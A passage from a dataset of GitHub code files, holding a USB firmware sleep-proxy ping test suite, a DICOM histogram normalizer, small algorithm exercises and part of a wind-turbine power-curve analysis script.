26 x 27^5\nthen 5 would be 26 x 27^4\nso basically the total needed to cover all possible combinations with all lengths from 1 - 6 (6 + words will be stored at 6) is:\n(26) + (26 x 27) + (26 x 27^2) + (26 x 27^3) + (26 x 27^4) + (26 x 27^5)\n\n\n'''\n# print((27**5 + 27**4 + 27**3 + 27**2 + 27**1 + 27**0) * 26)\n# print(27**5 * 26)\n\n# prev = 0\n# for i in range(6):\n# prev += 27**i * 26\n# print(prev, end = \", \")\n# print()","repo_name":"hayden1126/CS50x","sub_path":"Week5/speller/tests/check.py","file_name":"check.py","file_ext":"py","file_size_in_byte":2890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"4432978100","text":"import sys\nsys.stdin = open(\"후보키_input.txt\")\n\ndef DFS(dep):\n\n if dep == LenC:\n # print(A)\n if Search(A): # 유일성을 만족함.\n # print(A)\n tmp = set()\n for y in range(LenC):\n if A[y] == 1:\n tmp.add(y)\n\n for s in id:\n if s - tmp == set():\n return\n id.append(tmp)\n # print(id)\n return\n\n for i in range(2):\n A[dep] = i\n DFS(dep + 1)\n A[dep] = 0\n\ndef Search(A):\n\n tmp = {}\n for x in range(LenR):\n name = ''\n for y in range(LenC):\n if A[y] == 1:\n name += relation[x][y]\n if name != '' and name not in tmp:\n tmp[name] = 1\n else:\n return 0\n # print(tmp)\n return 1\n\n\nrelation = [list(input().split()) for _ in range(6)]\n\nanswer = 0\nLenC = len(relation[0])\nLenR = len(relation)\n\nvisit = [0] * LenC # 유일성과 최소성을 지킨 열은 체크하자.\nid = []\n# 모든 부분 집합의 경우의 수를 전부 탐색해야한다.\n# 그 중 visit이 체크되면 그 부분은 continue\n\nA = [0] * LenC\nDFS(0)\nanswer = len(id)\nprint(answer)","repo_name":"yoonwoo123/Algorithm","sub_path":"191129알고_pro_kakao/후보키.py","file_name":"후보키.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"24894121472","text":"\"\"\"\n THIS SCRIPT MUST BE EXECUTED ON LKP.\n\"\"\"\nimport os\nimport time\n\nimport pytest\n\nfrom tools.command import Command\nfrom tools.pactoolper import PacTool, CAPS_AQ_USB_VENDOR_CMD_PHY_OPTS, CAPS_AQ_USB_VENDOR_CMD_SLEEP_PROXY, \\\n USB_POWER, USB_SLEEP_PROXY\nfrom tools.constants import LINK_SPEED_AUTO, MTU_1500\nfrom infra.test_base import TestBase, idparametrize\nfrom tools.driver import Driver, DRV_TYPE_DIAG_WIN_USB\nfrom tools.drv_iface_cfg import DrvUsbConfig\nfrom tools.power import Power\nfrom tools.utils import get_atf_logger\n\nlog = get_atf_logger()\n\n\ndef setup_module(module):\n # import tools._test_setup # uncomment for manual test setup\n os.environ[\"TEST\"] = \"fw_usb_sleep_proxy\"\n\n\nclass TestFWUsbSleepProxy(TestBase):\n AFTER_TURNOFF_DELAY = 30\n BEFORE_PING_DELAY = 15\n WAKE_COUNTER_DELAY = 5\n\n DUT_MAC = \"00:17:b6:a1:a2:a3\"\n DUT_IPs4 = [\"192.168.0.3\", \"192.168.0.4\", \"192.168.0.5\"]\n DUT_IPs6 = [\"4000:0000:0000:0000:1601:bd17:0c02:2403\",\n \"4000:0000:0000:0000:1601:bd17:0c02:2413\",\n \"4000:0000:0000:0000:1601:bd17:0c02:2423\",\n \"4000:0000:0000:0000:1601:bd17:0c02:2433\"]\n LKP_IP4 = \"192.168.0.24\"\n NETMASK_IP4 = \"255.255.255.0\"\n LKP_IP6 = \"4000:0000:0000:0000:1601:bd17:0c02:2402\"\n PREFIX_IP6 = \"64\"\n WAKEPORT = 13370\n\n SLEEP_PROXY_FLAG_MAGIC_PACKET = 2\n\n @classmethod\n def setup_class(cls):\n super(TestFWUsbSleepProxy, cls).setup_class()\n\n try:\n cls.log_server_dir = cls.create_logs_dir_on_log_server()\n\n cls.install_firmwares()\n\n cls.dut_driver = Driver(port=cls.dut_port, drv_type=DRV_TYPE_DIAG_WIN_USB, version=cls.dut_drv_version,\n host=cls.dut_hostname)\n cls.lkp_driver = Driver(port=cls.lkp_port, version=cls.lkp_drv_version)\n cls.dut_driver.install()\n cls.lkp_driver.install()\n cls.dut_power = Power(host=cls.dut_hostname)\n cls.dut_pactool = PacTool(port=cls.dut_port, host=cls.dut_hostname)\n\n cls.lkp_ifconfig.set_link_speed(LINK_SPEED_AUTO)\n cls.lkp_ifconfig.set_ip_address(cls.LKP_IP4, cls.NETMASK_IP4, None)\n cls.lkp_ifconfig.set_ipv6_address(cls.LKP_IP6, cls.PREFIX_IP6, None)\n\n except Exception as e:\n log.exception(e)\n log.exception(\"Failed while setting up class\")\n raise e\n\n @classmethod\n def teardown_class(cls):\n super(TestFWUsbSleepProxy, cls).teardown_class()\n # Put wol on LKP back\n cmd = \"sudo ethtool -s {} wol g\".format(cls.lkp_iface)\n disable_cmd = Command(cmd=cmd)\n disable_cmd.run_join(10)\n\n def setup_method(self, method):\n super(TestFWUsbSleepProxy, self).setup_method(method)\n\n if not self.is_host_alive_and_ready(self.dut_hostname):\n raise Exception(\"DUT is not online, can't perform test\")\n\n if not self.dut_driver.is_installed():\n self.dut_driver.install()\n\n def teardown_method(self, method):\n super(TestFWUsbSleepProxy, self).teardown_method(method)\n self.bring_host_online(self.dut_hostname)\n\n def hibernate_dut(self, retry_interval=15):\n log.info(\"Hibernating DUT\")\n self.dut_power.hibernate()\n if not self.poll_host_powered_off(self.dut_hostname, retry_interval=retry_interval):\n raise Exception(\"Couldn't hibernate DUT\")\n log.info(\"DUT is hibernated\")\n\n time.sleep(self.AFTER_TURNOFF_DELAY)\n if self.is_host_powered_on(self.dut_hostname):\n raise Exception(\"DUT came back online spuriously before test\")\n log.info(\"DUT is still hibernated after {} seconds of sleeping\".format(self.AFTER_TURNOFF_DELAY))\n\n # Link should be UP on link partner\n speed = self.lkp_ifconfig.wait_link_up()\n assert speed == self.supported_speeds[0]\n\n def run_test_with_offloads(self, ip_v4_address, ip_v6_address):\n eth_cfg = DrvUsbConfig()\n dut_mac_address = [int(m, 16) for m in self.DUT_MAC.split(\":\")]\n wol_bit = self.SLEEP_PROXY_FLAG_MAGIC_PACKET\n data = 0\n for i in range(len(eth_cfg.mac_octets)):\n eth_cfg.mac_octets[i] = dut_mac_address[i]\n eth_cfg.flags = wol_bit\n eth_cfg.wolPatternCount = 0\n for j in range(len(eth_cfg.wolPatterns)):\n for i in range(len(eth_cfg.wolPatterns[j].mask)):\n eth_cfg.wolPatterns[j].mask[i] = 0\n eth_cfg.wolPatterns[j].crc16 = 0\n eth_cfg.wolPatterns[j].crc32 = 0\n eth_cfg.linkUpTimeout = 0\n eth_cfg.linkDownTimeout = 0\n eth_cfg.ipv4Count = len(ip_v4_address)\n for i in range(eth_cfg.ipv4Count):\n eth_cfg.ipv4[i] = ip_v4_address[i]\n for i in range(eth_cfg.ipv4Count, len(eth_cfg.ipv4)):\n eth_cfg.ipv4[i] = 0\n eth_cfg.ipv6Count = len(ip_v6_address)\n for j in range(len(ip_v6_address)):\n for i in range(len(ip_v6_address[j])):\n eth_cfg.ipv6[j].ipv6[i] = ip_v6_address[j][i]\n data = eth_cfg.get_data()\n self.dut_pactool.control_transfer_out(vendor_cmd=CAPS_AQ_USB_VENDOR_CMD_SLEEP_PROXY,\n data=data, size=len(data))\n time.sleep(5)\n self.dut_pactool.control_transfer_out(vendor_cmd=CAPS_AQ_USB_VENDOR_CMD_PHY_OPTS,\n data=[0, 0, USB_SLEEP_PROXY | USB_POWER, 0], size=4)\n log.info('Wol for wake on magic packet and sleep proxy are configured')\n # Link should be UP on link partner\n speed = self.lkp_ifconfig.wait_link_up()\n assert speed == self.supported_speeds[0]\n\n time.sleep(self.BEFORE_PING_DELAY)\n\n @idparametrize(\"hibernation\", [False, True])\n def test_icmp_offload(self, hibernation):\n \"\"\"\n @description: Perform simple ping check in sleep proxy mode (IPv4 version).\n\n @steps:\n 1. Configure DUT offload with multiple IPv4 addresses.\n 2. Ping each DUT's IP from LKP (16 requests).\n 3. Make sure all pings are answered.\n\n @result: Ping is passed.\n @duration: 80 seconds.\n \"\"\"\n ip_v4_addresses = []\n for i in range(len(self.DUT_IPs4)):\n addr = [int(m) for m in self.DUT_IPs4[i].split(\".\")]\n ip_v4_addresses.append(addr[0] | addr[1] << 8 | addr[2] << 16 | addr[3] << 24)\n\n self.run_test_with_offloads(ip_v4_addresses, [])\n\n if hibernation:\n self.hibernate_dut()\n\n for address in self.DUT_IPs4:\n log.info(\"Ping {} from {}\".format(address, self.LKP_IP4))\n assert self.ping(self.lkp_hostname, address, 16, ipv6=False, src_addr=self.LKP_IP4) is True, \\\n \"Failed to ping {} from {}\".format(address, self.LKP_IP4)\n\n @idparametrize(\"hibernation\", [False, True])\n def test_ipv6_offload(self, hibernation):\n \"\"\"\n @description: Perform simple ping check in sleep proxy mode (IPv6 version).\n\n @steps:\n 1. Configure DUT offload with multiple IPv6 addresses.\n 2. Ping each DUT's IP from LKP (16 requests).\n 3. Make sure all pings are answered.\n\n @result: Ping is passed.\n @duration: 90 seconds.\n \"\"\"\n ip_v6_address = []\n for i in range(len(self.DUT_IPs6)):\n addr = [int(m, 16) for m in self.DUT_IPs6[i].split(\":\")]\n v6_addr = []\n for j in range(len(addr)):\n v6_addr.append((addr[j] & 0xff00) >> 8)\n v6_addr.append(addr[j] & 0x00ff)\n ip_v6_address.append(v6_addr)\n\n self.run_test_with_offloads([], ip_v6_address)\n\n if hibernation:\n self.hibernate_dut()\n\n for address in self.DUT_IPs6:\n log.info(\"Ping {} from {}\".format(address, self.LKP_IP6))\n assert self.ping(self.lkp_hostname, address, 16, ipv6=True, src_addr=self.LKP_IP6) is True, \\\n \"Failed to ping {} from {}\".format(address, self.LKP_IP6)\n\n @idparametrize(\"hibernation\", [False, True])\n def test_small_fragmentated_pings(self, hibernation):\n \"\"\"\n @description: Perform ping check in sleep proxy mode with fragmented requests.\n\n @steps:\n 1. Configure DUT offload with multiple IPv4 and IPv6 addresses.\n 2. Set 200 MTU on LKP.\n 3. Ping each DUT's IP from LKP (16 requests, length 500 bytes).\n 4. Make sure all pings are answered.\n\n @result: Ping is passed.\n @duration: 80 seconds.\n \"\"\"\n try:\n self.lkp_ifconfig.set_mtu(200)\n\n ip_v4_addresses = []\n for i in range(len(self.DUT_IPs4)):\n addr = [int(m) for m in self.DUT_IPs4[i].split(\".\")]\n ip_v4_addresses.append(addr[0] | addr[1] << 8 | addr[2] << 16 | addr[3] << 24)\n\n self.run_test_with_offloads(ip_v4_addresses, [])\n\n if hibernation:\n self.hibernate_dut()\n\n for address in self.DUT_IPs4:\n log.info(\"Ping {} from {}\".format(address, self.LKP_IP4))\n assert self.ping(\n self.lkp_hostname, address, 16, ipv6=False, src_addr=self.LKP_IP4, payload_size=500, margin=20\n ) is True, \"Ping {} from {} failed unexpectedly (first request fragment should be replied)\".format(\n address, self.LKP_IP4\n )\n finally:\n self.lkp_ifconfig.set_mtu(MTU_1500)\n\n @idparametrize(\"hibernation\", [False, True])\n def test_big_packets_drop_pings(self, hibernation):\n \"\"\"\n @description: Perform ping check in sleep proxy mode after big packets.\n\n @steps:\n 1. Configure DUT offload with multiple IPv4 and IPv6 addresses.\n 2. Ping each DUT's IP from LKP (16 requests, length 5000 bytes).\n 3. FW should drop these pings.\n 4. Ping each DUT's IP from LKP (16 requests).\n 5. Make sure all pings are answered.\n\n @result: Ping is passed.\n @duration: 80 seconds.\n \"\"\"\n ip_v4_addresses = []\n for i in range(len(self.DUT_IPs4)):\n addr = [int(m) for m in self.DUT_IPs4[i].split(\".\")]\n ip_v4_addresses.append(addr[0] | addr[1] << 8 | addr[2] << 16 | addr[3] << 24)\n\n self.run_test_with_offloads(ip_v4_addresses, [])\n\n if hibernation:\n self.hibernate_dut()\n\n for address in self.DUT_IPs4:\n log.info(\"Ping {} from {}\".format(address, self.LKP_IP4))\n # Run 500 payload packets should be dropped\n self.ping(self.lkp_hostname, address, 16, ipv6=False, src_addr=self.LKP_IP4, payload_size=5000, margin=20)\n # Run small payload packets should be transfered\n assert self.ping(self.lkp_hostname, address, 16, ipv6=False, src_addr=self.LKP_IP4) is True, \\\n \"Failed to ping {} from {}\".format(address, self.LKP_IP4)\n\n @idparametrize(\"hibernation\", [False, True])\n def test_ipv4_offload_multi_networks(self, hibernation):\n \"\"\"\n @description: Perform ping check in sleep proxy mode with multiple networks (IPv4 version).\n\n @steps:\n 1. Configure DUT offload with multiple IPv4 addresses in different local networks.\n 2. Set IP address on LKP for each local network.\n 3. Ping each DUT's IP from LKP (4 requests).\n 4. Make sure all pings are answered.\n\n @result: Ping is passed.\n @duration: 60 seconds.\n \"\"\"\n DUT_IP4_1 = [\"169.254.23.232\", \"169.254.23.233\", \"169.254.23.234\"]\n LKP_IP4_1 = [\"169.254.23.1\"]\n LKP_MSK_1 = [\"255.255.0.0\"]\n\n DUT_IP4_2 = [\"192.168.0.3\", \"192.168.0.4\"]\n LKP_IP4_2 = [\"192.168.0.2\"]\n LKP_MSK_2 = [\"255.255.255.0\"]\n\n DUT_IP4_3 = [\"10.0.0.3\"]\n LKP_IP4_3 = [\"10.0.0.2\"]\n LKP_MSK_3 = [\"255.255.255.240\"]\n\n ip_v4_addresses = []\n for i in range(len(DUT_IP4_1)):\n addr = [int(m) for m in DUT_IP4_1[i].split(\".\")]\n ip_v4_addresses.append(addr[0] | addr[1] << 8 | addr[2] << 16 | addr[3] << 24)\n for i in range(len(DUT_IP4_2)):\n addr = [int(m) for m in DUT_IP4_2[i].split(\".\")]\n ip_v4_addresses.append(addr[0] | addr[1] << 8 | addr[2] << 16 | addr[3] << 24)\n addr = [int(m) for m in DUT_IP4_3[0].split(\".\")]\n ip_v4_addresses.append(addr[0] | addr[1] << 8 | addr[2] << 16 | addr[3] << 24)\n\n # Configure IPv4 on LKP\n for i in range(len(LKP_IP4_1)):\n self.lkp_ifconfig.set_ip_address(LKP_IP4_1[i], LKP_MSK_1[i], None)\n for i in range(len(LKP_IP4_2)):\n self.lkp_ifconfig.set_ip_address(LKP_IP4_2[i], LKP_MSK_2[i], None)\n for i in range(len(LKP_IP4_3)):\n self.lkp_ifconfig.set_ip_address(LKP_IP4_3[i], LKP_MSK_3[i], None)\n\n self.run_test_with_offloads(ip_v4_addresses, [])\n\n if hibernation:\n self.hibernate_dut()\n\n for addr in DUT_IP4_1:\n log.info(\"Ping from {} to {} ...\".format(LKP_IP4_1[0], addr))\n assert self.ping(self.lkp_hostname, addr, 4, ipv6=False, src_addr=LKP_IP4_1[0]) is True, \\\n \"Failed to ping {} from {}\".format(addr, LKP_IP4_1[0])\n for addr in DUT_IP4_2:\n log.info(\"Ping from {} to {} ...\".format(LKP_IP4_2[0], addr))\n assert self.ping(self.lkp_hostname, addr, 4, ipv6=False, src_addr=LKP_IP4_2[0]) is True, \\\n \"Failed to ping {} from {}\".format(addr, LKP_IP4_2[0])\n for addr in DUT_IP4_3:\n log.info(\"Ping from {} to {} ...\".format(LKP_IP4_3[0], addr))\n assert self.ping(self.lkp_hostname, addr, 4, ipv6=False, src_addr=LKP_IP4_3[0]) is True, \\\n \"Failed to ping {} from {}\".format(addr, LKP_IP4_3[0])\n\n\nif __name__ == \"__main__\":\n pytest.main([__file__, \"-s\", \"-v\"])\n","repo_name":"dgubanovv/qa-tests","sub_path":"usb_fw_sleep_proxy.py","file_name":"usb_fw_sleep_proxy.py","file_ext":"py","file_size_in_byte":13835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"18813995089","text":"\n \n# write a python program to using a function to print factroial number series from n to m numbers.\n\ndef fact_calculate(number):\n fact = 1\n for i in range(1,number+1):\n fact = fact * i\n return fact\n \n\nn = int(input(\"Please enter firt number.\"))\nm = int(input(\"Please enter secound number.\"))\nfor i in range(n,m+1):\n print(fact_calculate(i))","repo_name":"Saurabh1Barasiya/100_days_of_code","sub_path":"question1.py","file_name":"question1.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72030606167","text":"try:\n import ROOT\n ROOTfound=True\nexcept ImportError:\n ROOTfound=False\n print(\"WARNING Normalizer.py: ROOT not found\")\nimport numpy as np\nfrom dicom_tools.FileReader import FileReader\n\nclass Normalizer:\n\n def __init__(self, verbose=False):\n self.verbose = verbose\n self.RootOutput = False\n self.layer=-1\n self.NormLayer=-1\n if self.verbose:\n print(\"Normalizer: init verbose\\n\")\n\n self.externalTemplateSetted = False\n self.externalTemplate = None\n\n def setExternalTemplate(self, dcmfile):\n freader = FileReader(dcmfile, False, self.verbose)\n dataRGB, unusedROI = freader.read(False)\n self.externalTemplateSetted = True\n self.externalTemplate = dataRGB[:,:,0]\n self.NormLayer = -1\n \n def setNormLayer(self, layer=-1):\n self.NormLayer=layer\n self.externalTemplateSetted = False\n self.externalTemplate = None\n \n def setRootOutput(self, prefix=\"\"):\n self.RootOutput = True\n self.allHistos = []\n self.RootPrefix = prefix\n\n def writeRootOutputOnFile(self, outfname=\"out.root\"):\n outfile= ROOT.TFile(outfname,\"RECREATE\")\n for histo in self.allHistos:\n histo.Write()\n\n outfile.Write()\n outfile.Close()\n \n \n def hist_match(self, source, template):\n \"\"\"\n Adjust the pixel values of a grayscale image such that its histogram\n matches that of a target image\n \n Arguments:\n -----------\n source: np.ndarray\n Image to transform; the histogram is computed over the flattened array\n template: np.ndarray\n Template image; can have different dimensions to source\n Returns:\n -----------\n matched: np.ndarray\n The transformed output image\n \"\"\"\n\n oldshape = source.shape\n # contiguous flattened array\n # https://docs.scipy.org/doc/numpy/reference/generated/numpy.ravel.html\n source = source.ravel()\n template = template.ravel()\n \n # get the set of unique pixel values and their corresponding indices and\n # counts\n # https://docs.scipy.org/doc/numpy/reference/generated/numpy.unique.html\n s_values, bin_idx, s_counts = np.unique(source, return_inverse=True,\n return_counts=True)\n t_values, t_counts = np.unique(template, return_counts=True)\n \n # take the cumsum of the counts and normalize by the number of pixels to\n # get the empirical cumulative distribution functions for the source and\n # template images (maps pixel value --> quantile)\n # https://docs.scipy.org/doc/numpy/reference/generated/numpy.cumsum.html?highlight=sum\n s_quantiles = np.cumsum(s_counts).astype(np.float64)\n s_quantiles /= s_quantiles[-1]\n t_quantiles = np.cumsum(t_counts).astype(np.float64)\n t_quantiles /= t_quantiles[-1]\n \n # interpolate linearly to find the pixel values in the template image\n # that correspond most closely to the quantiles in the source image\n interp_t_values = np.interp(s_quantiles, t_quantiles, t_values)\n \n if self.RootOutput:\n suffix=str(self.layer)\n prefix=self.RootPrefix\n nBin = 500\n cumsumOrig = ROOT.TH1F(prefix+\"cumsumOrig\"+suffix,prefix+\"cumsumOrig\"+suffix,nBin,s_values.min(),s_values.max())\n cumsumTemplate = ROOT.TH1F(prefix+\"cumsumTemplate\"+suffix,prefix+\"cumsumTemplate\"+suffix,nBin,t_values.min(),t_values.max())\n cumsumInterp = ROOT.TH1F(prefix+\"cumsumInterp\"+suffix,prefix+\"cumsumInterp\"+suffix,nBin,interp_t_values.min(),interp_t_values.max())\n for s_value in s_values:\n cumsumOrig.Fill(s_value)\n for t_value in t_values:\n cumsumTemplate.Fill(s_value)\n for interp_t_value in interp_t_values:\n cumsumInterp.Fill(interp_t_value)\n \n self.allHistos.append(cumsumTemplate) \n self.allHistos.append(cumsumOrig) \n self.allHistos.append(cumsumInterp)\n\n return interp_t_values[bin_idx].reshape(oldshape)\n\n\n \n def match_all(self, data):\n norm_layer=self.NormLayer\n \n matched=np.zeros(data.shape)\n if len(data.shape)==4:\n layers = len(data[:,:,:,0])\n if not self.externalTemplateSetted:\n if norm_layer <0:\n norm_layer = int(layers/2+0.5)\n matched[norm_layer,:,:,0]=matched[norm_layer,:,:,1]=matched[norm_layer,:,:,2] = data[norm_layer,:,:,0]\n template = data[norm_layer,:,:,0]\n else:\n template = self.externalTemplate\n \n for self.layer in xrange(0,layers):\n if self.layer == norm_layer:\n continue\n matched[self.layer,:,:,0]=matched[self.layer,:,:,1]=matched[self.layer,:,:,2]= self.hist_match(data[self.layer,:,:,0], template)\n elif len(data.shape)==3:\n layers = len(data)\n if norm_layer <0:\n norm_layer = int(layers/2+0.5)\n matched[norm_layer] = data[norm_layer]\n for self.layer in xrange(0,layers):\n if self.layer == norm_layer:\n continue\n matched[self.layer] = self.hist_match(data[self.layer], data[norm_layer])\n\n else:\n print(\"ERROR hist_match data has not 4 axis nor 3\")\n \n return matched\n","repo_name":"carlomt/dicom_tools","sub_path":"dicom_tools/Normalizer.py","file_name":"Normalizer.py","file_ext":"py","file_size_in_byte":5643,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"31"} +{"seq_id":"25343128203","text":"\"\"\"\nhttps://www.hackerrank.com/challenges/ctci-is-binary-search-tree/problem\n\"\"\"\n\"\"\" Node is defined as\nclass node:\n def __init__(self, data):\n self.data = data\n self.left = None\n self.right = None\n\"\"\"\n\ndef checkBST(root):\n in_order_list = []\n in_order_stk = []\n node1 = root\n while node1 or len(in_order_stk) > 0:\n if node1:\n in_order_stk.append(node1)\n node1 = node1.left\n else:\n node1 = in_order_stk.pop()\n in_order_list.append(node1.data)\n node1 = node1.right \n\n l = len(in_order_list) - 1\n\n if l <= 0:\n return False\n while l > 0:\n if in_order_list[l] <= in_order_list[l-1]:\n return False\n l -= 1\n return True","repo_name":"nirmalya123/tricky_algorithms","sub_path":"check_if_bst.py","file_name":"check_if_bst.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"10408762080","text":"# Import Modules\n# In[]:\n\nimport sys\nimport os\nimport os.path as path\nimport xarray as xr\nfrom netCDF4 import Dataset\nimport numpy as np\nimport pandas as pd\nfrom scipy import interpolate\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as mdates\n\n# In[]:\nsys.path.insert(0, os.path.dirname(os.getcwd()))\nfrom data_processing_slice import *\nfrom plotting_slice import *\n\n# In[]:\ndef compute_indices_weights_for_slices (case_dir_map, hub_height):\n for case in case_dir_map.keys():\n dz = case_dir_map[case]['dz']\n\n z_ind1 = hub_height // int(dz)\n z_ind2 = z_ind1 + 1\n z1 = int(dz*z_ind1)\n z2 = int(dz*z_ind2)\n w1 = 1.0 - (hub_height - z1)/dz\n w2 = 1.0 - (z2 - hub_height)/dz\n print('z_indices: [{}, {}], z: [{}, {}], weights: [{}, {}]'.format(\n z_ind1, z_ind2, z1, z2, w1, w2))\n\n case_dir_map[case]['z_indices'] = [z_ind1, z_ind2]\n case_dir_map[case]['weights'] = [w1, w2]\n \n return case_dir_map\n\n# In[]:\ndef prepare_NREL_data (WRF_result_base_loc, vhub):\n NREL_Data = pd.read_csv(os.path.join(WRF_result_base_loc,'NREL_5MW_126_RWT.csv'))\n ws_NREL = list(NREL_Data['Wind Speed [m/s]'])\n power_NREL = list(NREL_Data['Power [kW]'])\n\n f = interpolate.interp1d(ws_NREL, power_NREL)\n power_interp = f(vhub)\n \n return NREL_Data, ws_NREL, power_NREL, power_interp\n\n# In[]\ndef initialize_tabulated_data (power_interp, ind1_for_tab, ind2_for_tab, ind3_for_tab):\n case_tab = ['NREL']\n power1_tab = [power_interp[ind1_for_tab]*1.0e+3]\n power2_tab = [power_interp[ind2_for_tab]*1.0e+3]\n power3_tab = [power_interp[ind3_for_tab]*1.0e+3]\n error1_tab = [0.0]\n error2_tab = [0.0]\n error3_tab = [0.0]\n\n return case_tab, power1_tab, power2_tab, power3_tab, error1_tab, error2_tab, error3_tab\n\n# In[]:\ndef read_power_for_a_wind_speed (WRF_result_base_loc, case, outfile, ind_vhub, ws_hub, power_case_ws):\n case_for_ws = path.join(WRF_result_base_loc, case, 'power_curve_{}'.format(ws_hub))\n #print ('case_for_ws: {}'.format(case_for_ws))\n case_nc_file = path.join(case_for_ws, outfile)\n #print ('case_nc_file: {}'.format(case_nc_file))\n case_data = Dataset(case_nc_file, mode='r')\n case_power = case_data.variables['POWER'][:]\n #print ('case_power: ', case_power)\n case_data.close()\n\n if (len(case_power) <2):\n power_case_ws[ind_vhub] = np.nan\n else:\n power_case_ws[ind_vhub] = case_power[1]\n \n return power_case_ws\n\n\n# In[]:\ndef read_power_for_a_case (WRF_result_base_loc, case, vhub, power_interp, outfile, \\\n case_dir_map, case_tab, \\\n power1_tab, power2_tab, power3_tab, \\\n error1_tab, error2_tab, error3_tab, \\\n ind1_for_tab, ind2_for_tab, ind3_for_tab):\n print('Case: {}'.format(case))\n print('Legend: {}'.format(case_dir_map[case]['legend']))\n case_tab.append(case)\n\n power_case_ws = np.zeros(len(vhub))\n for ind_vhub, ws_hub in enumerate(vhub):\n power_case_ws = read_power_for_a_wind_speed (WRF_result_base_loc, case, outfile, \\\n ind_vhub, ws_hub, power_case_ws)\n #print('power_case_ws: ', power_case_ws)\n case_dir_map[case]['power'] = power_case_ws\n\n error_NREL = (power_case_ws*1e-3/power_interp - 1.0)*100\n case_dir_map[case]['error'] = error_NREL\n\n print('Power: {}'.format(case_dir_map[case]['power']))\n print('Error w.r.t. NREL: {}'.format(case_dir_map[case]['error']))\n\n power1_tab.append(float('%.0f'%(power_case_ws[ind1_for_tab])))\n power2_tab.append(float('%.0f'%(power_case_ws[ind2_for_tab])))\n power3_tab.append(float('%.0f'%(power_case_ws[ind3_for_tab])))\n error1_tab.append(float('%5.2f'%(error_NREL[ind1_for_tab])))\n error2_tab.append(float('%5.2f'%(error_NREL[ind2_for_tab])))\n error3_tab.append(float('%5.2f'%(error_NREL[ind3_for_tab])))\n\n print ('\\n')\n \n return case_dir_map, case_tab, power1_tab, power2_tab, power3_tab, error1_tab, error2_tab, error3_tab\n\n\n# In[]:\ndef tabulate_data_for_cases (tab_data_file, vhub, case_tab, \\\n power1_tab, power2_tab, power3_tab, \\\n error1_tab, error2_tab, error3_tab, \\\n ind1_for_tab, ind2_for_tab, ind3_for_tab):\n tabulated_data = pd.DataFrame(index = case_tab)\n tabulated_data['power[vhub = {}]'.format(vhub[ind1_for_tab])] = power1_tab\n tabulated_data['error[vhub = {}]'.format(vhub[ind1_for_tab])] = error1_tab\n tabulated_data['power[vhub = {}]'.format(vhub[ind2_for_tab])] = power2_tab\n tabulated_data['error[vhub = {}]'.format(vhub[ind2_for_tab])] = error2_tab\n tabulated_data['power[vhub = {}]'.format(vhub[ind3_for_tab])] = power3_tab\n tabulated_data['error[vhub = {}]'.format(vhub[ind3_for_tab])] = error3_tab\n print('Tabulated Dataframe: \\n{}\\n'.format(tabulated_data))\n tabulated_data.to_csv(tab_data_file)\n \n \n# In[]:\ndef plot_power_curve_for_cases (NREL_Data, vhub, case_keys, case_dir_map, plt_title, \\\n figFileName, savefig):\n pr = 1.00\n\n #plt.cla()\n # POWER Curve\n plt.figure()\n plt.plot(NREL_Data['Wind Speed [m/s]'], NREL_Data['Power [kW]']*1e-3/pr, 'k-', label = 'NREL data')\n #plt.plot([0,20],[5,5],'k--',label='Rated power')\n for case in case_keys:\n power_case_ws = case_dir_map[case]['power']\n legend = case_dir_map[case]['legend']\n line_style = case_dir_map[case]['line_style']\n plt.plot(vhub, power_case_ws*1e-6/pr, line_style, label=legend)\n plt.title(plt_title,fontsize=12)\n plt.xlim(2.9,15.1)\n plt.xticks(np.arange(3,15,1.5))\n plt.ylim(0,7.0)\n plt.xlabel(r'Hub-height wind speed [m s$^{-1}$]',fontsize=12)\n plt.ylabel(r'Power (MW)',fontsize=12)\n plt.legend(loc='best')\n plt.tick_params(axis = 'x', labelsize=12)\n plt.tick_params(axis = 'y', labelsize=12)\n \n if savefig:\n plt.savefig(figFileName, bbox_inches='tight')\n \n plt.show()\n \n# In[]:\ndef plot_power_curve_error_for_cases (vhub, case_keys, case_dir_map, plt_title):\n #plt.cla()\n # Error w.r.t. NREL data\n plt.figure()\n for case in case_keys:\n error_case_ws = case_dir_map[case]['error']\n legend = case_dir_map[case]['legend']\n line_style = case_dir_map[case]['line_style']\n plt.plot(vhub, error_case_ws, line_style, label=legend)\n plt.title(plt_title,fontsize=12)\n plt.xlim(2.9,15.1)\n plt.xticks(np.arange(3,15,1.5))\n plt.xlabel(r'Hub-height wind speed [m s$^{-1}$]',fontsize=12)\n plt.ylabel(r'Percent error w.r.t. NREL data',fontsize=12)\n plt.legend(loc='best')\n plt.gca().tick_params(labelsize=10)\n\n plt.show()\n \n \n# In[]:\ndef read_wrfout_data_for_case_ws (WRF_result_base_loc, case, ws, outfile):\n case_loc = os.path.join(WRF_result_base_loc, case)\n case_ws_loc = os.path.join(case_loc, 'power_curve_{}'.format(ws))\n \n case_ws_outfile = path.join(case_ws_loc, outfile)\n case_ws_wrf_data = xr.open_dataset(case_ws_outfile)\n \n return case_ws_wrf_data\n\n# In[]:\ndef read_tsout_data_for_case_ws (WRF_result_base_loc, case, ws, tsoutfile):\n case_loc = path.join(WRF_result_base_loc, case)\n case_ws_loc = path.join(case_loc, 'power_curve_{}'.format(ws))\n #print('case/wind_speed loc: {}'.format(case_ws_loc))\n \n case_ws_tsoutfile = path.join(case_ws_loc, tsoutfile)\n case_ws_ts_data = xr.open_dataset(case_ws_tsoutfile)\n \n return case_ws_ts_data\n\n# In[]:\ndef get_hub_height_slice_data_case_ws (WRF_result_base_loc, case, ws, outfile, tsoutfile, \\\n time_ind, z_ind1, z_ind2, w1, w2):\n case_ws_wrf_data = read_wrfout_data_for_case_ws (WRF_result_base_loc, case, ws, outfile)\n case_ws_ts_data = read_tsout_data_for_case_ws (WRF_result_base_loc, case, ws, tsoutfile)\n DX, DY = case_ws_wrf_data.DX, 